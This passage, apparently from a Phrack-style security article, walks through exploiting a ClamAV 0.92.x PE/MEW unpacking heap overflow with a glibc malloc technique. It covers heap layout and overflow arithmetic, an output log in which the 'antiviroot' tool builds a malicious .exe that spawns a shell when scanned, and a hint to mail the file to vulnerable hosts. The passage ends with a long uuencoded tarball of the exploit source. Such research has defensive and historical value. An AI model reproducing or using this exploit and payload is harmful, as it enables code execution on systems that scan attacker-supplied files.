+offsets, several bound checks on PE headers etc). Let's ignore them
+for now since they are only interesting for those who are willing
+to code an exploit of their own. What we are really interested in,
+is just the core idea behind this exploit.
+
+Since 'dsize' is added to 'src' in the read() operation, the attacker
+can give 'dsize' such a value, so that when added to 'src', the
+heap address of 'src' is eventually produced (via an integer
+overflow). Then, read(), places all the user supplied data there,
+which may contain specially crafted heap and arena headers, etc.
+So schematically, the situation looks like the following figure
+(assuming the 'src' pointer has a value of 0xdeadbeef):
+
+   0xdea00000                   0xdeadbeef
+...+----------+-----------+-...-+-------------+--------------+...
+   | Heap hdr | Arena hdr |     | Chunk 'src' | Other chunks |
+...+----------+-----------+-...-+-------------+--------------+...
+
+So, if one manages to overwrite the whole region, from the heap
+header to the 'src' chunk, then they can also overwrite the chunks
+neighboring 'src' and perform the technique presented earlier. But
+there are certain obstacles which can't be just ignored:
+
+* From 0xdea00000 to 0xdeadbeef various chunks may also be present,
+and overwriting this region may result in premature terminations
+of the ClamAV scan process.
+
+* 3 More chunks should be present right after the 'src' chunk and
+they should be also alterable by the overflow.
+
+* One needs the actual value of the 'src' pointer.
+
+Fortunately, there's a solution for each of them:
+
+* One can force ClamAV not to mess with the chunks between the heap
+header and the 'src' chunk. An attacker may achieve this by following
+a precise vulnerable path.
+
+* Unfortunately, due to the heap layout during the execution of the
+buggy code, there are no chunks right after 'src'. Even if there
+were, one wouldn't be able to reach them due to some internal size
+checks in the cli_scanpe() code. After some basic math calculations
+(not presented here since they are more or less trivial), one can
+prove that the only chunk they can overwrite is the chunk pointed
+by 'src'. Then, cli_calloc() can be forced to allocate such a chunk,
+where one can place 4 fake chunks of a size larger than 72. This
+is exactly the same situation as having 4 contiguous preallocated
+heap chunks! :-)
+
+* Since the heap is, by default, not randomized, one can precalculate
+the 'src' value using gdb or some custom malloc() debugger (just
+like I did). This specific bug is hard to exploit when randomization
+is enabled. On the contrary, the general technique presented in
+this article, is immune to such security measures.
+
+Optionally, an attacker can force ClamAV allocate the 'src' chunk
+somewhere inside a heap hole created by realloc() or free(). This
+allows for the placement of the target chunk some bytes closer to
+the fake heap and arena headers, which, in turn, may allow for
+bypassing certain bound checks. Before the vulnerable snippet is
+reached, the following piece of code is executed:
+
+--- snip ---
+section_hdr = (struct pe_image_section_hdr *)cli_calloc(nsections, 
+  sizeof(struct pe_image_section_hdr));
+...
+
+exe_sections = (struct cli_exe_section *)cli_calloc(nsections,
+  sizeof(struct cli_exe_section));
+...
+
+free(section_hdr);
+--- snip ---
+
+This creates a hole at the location of the 'section_hdr' chunk. By
+carefully computing values for 'dsize' and 'ssize' so that their
+sum equals the product of 'nsections' and 'sizeof(struct
+pe_image_section_hdr)', one can make cli_calloc() reclaim the heap
+hole and return it (this is what antiviroot actually does). Notice
+that apart from the aforementioned condition, the value of 'dsize'
+should be such, so that 'src + dsize' equals to the heap address
+of 'src' (a.k.a. 'heap_for_ptr(src)').
+
+Finally, in order to trigger the vulnerable path in malloc.c, a
+free() should be issued on the 'src' chunk. This should be performed
+as soon as possible, since the MEW unpacking code may mess with the
+contents of the heap and eventually break things. Hopefully, the
+following code can be triggered in the ClamAV source.
+
+--- snip ---
+if(buff[0x7b] == '\xe8') {
+  ...
+
+  if(!CLI_ISCONTAINED(exe_sections[1].rva, exe_sections[1].vsz,
+    cli_readint32(buff + 0x7c) + fileoffset + 0x80, 4)) {
+    ...
+
+    free(src);
+  }
+}
+--- snip ---
+
+By planting the value 0xe8 in offset 0x7b of 'buff' and by forcing
+CLI_ISCONTAINED() to fail, one can force ClamAV to call free() on
+the 'src' chunk (the chunk whose header contains the NON_MAIN_ARENA
+flag when the read() operation completes). A '4 bytes anywhere'
+condition eventually takes place. In order to prevent ClamAV from
+crashing on the next free(), one can overwrite the .got address of
+free() and wait.
+
+--[ 2. The exploit
+
+So, here's how the exploit for this ClamAV bug looks like. For more
+info on the exploit usage you can check the related README file in
+the attachment. This code creates a specially crafted .exe file,
+which, when passed to clamscan, spawns a shell.
+
+--- snip ---
+$ ./antiviroot -a 0x98142e0 -r 0x080541a8 -s 441
+CLAMAV 0.92.x cli_scanpe() EXPLOIT / antiviroot.c 
+huku / huku _at_ grhack _dot_ net
+
+[~] Using address=0x098142e0 retloc=0x080541a8 size=441 file=exploit.exe
+[~] Corrected size to 480
+[~] Chunk 0x098142e0 has real address 0x098142d8
+[~] Chunk 0x098142e0 belongs to heap 0x09800000
+[~] 0x098142d8-0x09800000 = 82648 bytes space (0.08M)
+[~] Calculating ssize and dsize
+[~] dsize=0xfffebd20 ssize=0x000144c0 size=480
+[~] addr=0x098142e0 + dsize=0xfffebd20 = 0x09800000 (should be 0x09800000)
+[~] dsize=0xfffebd20 + ssize=0x000144c0 = 480 (should be 480)
+[~] Available space for exploitation 488 bytes (0.48K)
+[~] Done
+$ /usr/local/bin/clamscan exploit.exe 
+LibClamAV Warning: **************************************************
+LibClamAV Warning: ***  The virus database is older than 7 days.  ***
+LibClamAV Warning: ***        Please update it IMMEDIATELY!       ***
+LibClamAV Warning: **************************************************
+...
+
+sh-3.2$ echo yo
+yo
+sh-3.2$ exit
+exit
+--- snip ---
+
+A more advanced scenario would be attaching the executable file and
+mailing it to a couple of vulnerable hosts and... KaBooM! Eventually,
+it seems that our technique is quite lethal even for real life
+scenarios. More advancements are possible, of course, they are left
+as an exercise to the reader :-)
+
+
+---[ IX. Epilogue 
+
+Personally, I belong with those who believe that the future of
+exploitation lies somewhere in kernelspace. The various userspace
+techniques are, like g463 said, more or less ephemeral. This paper
+was just the result of some fun I had with the glibc malloc()
+implementation, nothing more, nothing less.
+
+Anyway, all that stuff kinda exhausted me. I wouldn't have managed
+to write this article without the precious help of GM, eidimon and
+Slasher (yo guys!).
+
+Dedicated to the r00thell clique -- Wherever you are and whatever
+you do, I wish you guys (and girls ;-) all the best.
+
+
+---[ X. References
+
+[01] Vudo - An object superstitiously believed to embody magical powers 
+     Michel "MaXX" Kaempf <maxx@synnergy.net>
+     http://www.phrack.org/issues.html?issue=57&id=8#article
+
+[02] Once upon a free()...
+     anonymous <d45a312a@author.phrack.org>
+     http://www.phrack.org/issues.html?issue=57&id=9#article
+
+[03] Advanced Doug lea's malloc exploits
+     jp <jp@corest.com>
+     http://www.phrack.org/issues.html?issue=61&id=6#article  
+
+[04] w00w00 on Heap Overflows
+     Matt Conover & w00w00 Security Team
+     http://www.w00w00.org/files/articles/heaptut.txt
+
+[05] Heap off by one
+     qitest1 <qitest1@bespin.org>
+     http://freeworld.thc.org/root/docs/exploit_writing/heap_off_by_one.txt
+
+[06] The Malloc Maleficarum
+     Phantasmal Phantasmagoria <phantasmal@hush.ai>
+     http://www.packetstormsecurity.org/papers/attack/MallocMaleficarum.txt
+
+[07] JPEG COM Marker Processing Vulnerability in Netscape Browsers
+     Solar Designer <solar@openwall.com>
+     http://www.openwall.com/advisories/OW-002-netscape-jpeg/
+
+[08] Glibc heap protection patch
+     Stefan Esser <stefan@suspekt.org>
+     http://seclists.org/focus-ids/2003/Dec/0024.html
+
+[09] Exploiting the Wilderness
+     Phantasmal Phantasmagoria <phantasmal@hush.ai> 
+     http://seclists.org/vuln-dev/2004/Feb/0025.html
+
+[10] The use of set_head to defeat the wilderness
+     g463 <jean-sebastien@guay-leroux.com>
+     http://www.phrack.org/issues.html?issue=64&id=9#article
+
+[11] Two (or more?) glibc installations
+     Chariton Karamitas <chariton.karamitas@echothrust.com>
+     http://blogs.echothrust.com/chariton-karamitas/two-or-more-glibc-installations 
+
+[12] ClamAV Multiple Vulnerabilities 
+     Secunia Research 
+     http://secunia.com/advisories/28117/
+
+[13] Portable Executable and Common Object File Format Specification
+     Microsoft
+     http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx
+
+
+
+XI. Attachments
+
+begin 600 antiviroot.tar.gz
+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
